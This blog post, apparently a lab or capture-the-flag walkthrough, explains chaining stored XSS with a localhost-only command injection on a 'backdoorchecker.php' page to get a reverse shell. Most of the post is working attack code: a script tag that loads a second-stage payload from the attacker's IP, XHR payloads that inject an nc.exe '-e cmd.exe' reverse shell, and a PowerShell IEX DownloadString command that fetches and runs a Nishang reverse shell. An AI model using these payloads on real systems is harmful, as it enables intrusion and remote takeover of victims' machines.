From XSS CSRF + Command Injection To Reverse Shell

Hello Man,

I would like to share knowledge on how to leverage your attack once you have found one or two vulnerabilities to step further so that you can maximize the attack

In this scenario, I found two vulnerabilities of the page where we can inject javascript and do command injection. But due to contstraint of the code. the command injection could only be done from localhost. So the attack is to inject javascript that post command injection on behalf of the user current session

The XSS injection payload will contain two stages where the first stage the code that we inject is to load the second stage the biggger payload.

let see the first stage xss code

<script src="http://10.10.14.7/java.js"></script>

Method 1 Command Injection

The first payload when it is executed, it will load java.js file from the attacker IP. Below is the second stage payload. To allow the javascript load the second stage, you need to create a webserver on the attacker machine that host the second stage.

var xhttp = new XMLHttpRequest();
xhttp.open("POST","backdoorchecker.php", true);
xhttp.send("cmd=diras || \\\\10.10.14.7\\smb\\nc.exe -e cmd.exe 10.10.14.7 9090");

I use python module to create simple http server to host the second stage

python -m SimpleHTTPServer 80

When the browser execute the above code as javascript. It will create a POST to backdoorchecker.php page where the page has vulnerability of command injection. When the command injection is triggered, it will execute nc.exe from shared smb directory.

Method 2

The second method will use Nishang Powershell to establish reverseshell. We can modify the java.js script as below

var xhttp = new XMLHttpRequest();
var url='/admin/backdoorchecker.php'
var param = 'cmd=dir| powershell -c "IEX (New-Object Net.WebClient).DownloadString(\'http://10.10.14.7/rev.ps1\')"'
xhttp.open("POST",url, true);
xhttp.requestHeader('Content-Type','application/x-www-form-urlencoded')
xhttp.send(param);

With the above script, the process like will have like 3 stages. first javascript payload will load second stage javascript payload and finaly will download nishang powershell reverse tcp (rev.ps1)

below is for your reference. This is the backdoorchecker.php page that has vulnerability of command injection but can only be invoked from localhost.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s